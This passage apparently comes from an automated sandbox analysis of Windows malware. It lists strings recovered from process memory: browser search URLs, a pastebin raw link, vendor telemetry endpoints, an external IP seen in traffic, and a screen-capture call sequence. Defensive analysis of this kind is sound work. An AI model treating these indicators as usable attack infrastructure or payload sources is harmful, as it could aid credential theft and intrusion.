                          Source: u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206231639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.avira.com/download/
                          Source: u5ek.3.exe, 00000006.00000003.2249141509.0000000002624000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://indiantypefoundry.com
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.azure.com//.default
                          Source: MSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLX8
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                          Source: u5ek.0.exe, 00000001.00000003.1752307991.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/H
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003328000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: u5ek.0.exe, 00000001.00000003.1883816519.000000002A908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownHTTPS traffic detected: 195.181.163.193:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0018C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,2_2_0018C8B0

                          System Summary

                          barindex
